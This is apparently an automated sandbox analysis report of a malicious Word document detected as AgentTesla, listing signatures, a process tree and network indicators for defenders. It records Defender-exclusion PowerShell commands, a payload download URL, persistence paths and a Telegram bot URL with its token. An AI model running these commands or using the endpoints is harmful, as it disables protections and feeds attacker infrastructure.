
Analysis Report Allignright_companyprofile.doc

Overview

General Information

Sample Name: Allignright_companyprofile.doc
Analysis ID: 404236
MD5: 5a0c6dd1f7bbc5272f2ced270e2d4d8a
SHA1: 9f553e08793745277db8a0d3aa82a63b7526a28b
SHA256: fbc12470553e748b10dd0e1a15c6e28a1e777b626757349e46031f7e0608b8e6
Tags: AgentTesla, doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell adding suspicious path to exclusion list
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files to the startup folder
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Sigma detected: Non Interactive PowerShell
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1796 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • CTF loader_es.exe (PID: 2336 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
      • powershell.exe (PID: 2536 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2300 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2772 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2852 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • Bw6d8Paf6bOV36xS4N6.exe (PID: 2368 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
        • powershell.exe (PID: 1552 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 660 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2812 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2804 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2252 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3064 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • CTF loader_es.exe (PID: 2444 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
      • CTF loader_es.exe (PID: 2788 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
  • Bw6d8Paf6bOV36xS4N6.exe (PID: 1192 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
    • powershell.exe (PID: 2920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2300 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2760 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 1900 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • svchost.exe (PID: 2916 cmdline: 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 52.218.240.113, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1296, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\user\AppData\Roaming\CTF loader_es.exe, CommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CTF loader_es.exe, NewProcessName: C:\Users\user\AppData\Roaming\CTF loader_es.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1296, ProcessCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ProcessId: 2336
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentImage: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentProcessId: 2336, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, ProcessId: 2536

Malware Analysis System Evasion:

Sigma detected: Powershell adding suspicious path to exclusion list
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentImage: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentProcessId: 2336, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, ProcessId: 2300

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe; Virustotal: Detection: 41%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe; ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; Virustotal: Detection: 41%
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe; Virustotal: Detection: 41%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe; ReversingLabs: Detection: 44%
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe; ReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted file
Source: Allignright_companyprofile.doc; ReversingLabs: Detection: 14%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe; Joe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe; Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2536.6001966ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000005.00000002.2117946573.00000000003F3000.00000004.00000020.sdmp
Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2772.6004244ion.pdb source: powershell.exe, 00000009.00000002.2119685464.000000000037A000.00000004.00000020.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2124286114.0000000002AD0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Directory queried: number of queries: 2505
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; File opened: C:\Users\user\
Source: global traffic; DNS query: name: miolouno.s3-us-west-2.amazonaws.com
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 52.218.240.113:80

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown; DNS query: name: api.telegram.org
Source: global traffic; HTTP traffic detected: GET /mad.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: miolouno.s3-us-west-2.amazonaws.com | Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{784A4D1B-DE8E-4300-98F0-AE5841A8170E}.tmp
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown; DNS traffic detected: queries for: miolouno.s3-us-west-2.amazonaws.com
Source: CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmp; String found in binary or memory: https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/
Source: CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmp; String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe; File created: C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044
Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Roaming\CTF loader_es.exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
Source: classification engine; Classification label: mal100.troj.adwa.expl.evad.winDOC@46/28@3/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$lignright_companyprofile.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCBD6.tmpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$.......<.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................$...............................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................$...............................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................$.......C.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................$...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............................'.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................y.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................*.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................U.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................p.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............@.......$.......B.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............@.......$.......w.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............@.......P...............................0......./.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............@.......P...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............@.......................................0.......;...............|.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............@...............!.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......K.......................0.......G...............".......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............@...............g.......................0.......G.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............@.......................................0.......S.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............@.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............@.......................................0......._...............~.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............@.......P...............................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............@.......P...............................0.......k.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............@.......P...............................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............@.......P...............................0.......w.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@.......P...............................0.......................l.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@.......P...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............@...............>.......................0...............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@...............Y.......................0...............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......x.......P.......7.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......x...............u.......................0.......#.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......x.......L...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......x.......................................0......./.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......x.......L...............................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......x.......p.......,.......................0.......;.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......Z.......................0.......G.......x.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....T.......x.......p.......z.......................0.......G.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......x.......L...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......x.......p...............................0.......S.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....T.......x.......p...............................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....T.......x.......@.......'.......................0......._.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......x.......p.......\.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......x.......L...............................0.......k.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....T.......x.......L...............................0.......w.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......L.......+.......................0.......................l.......................
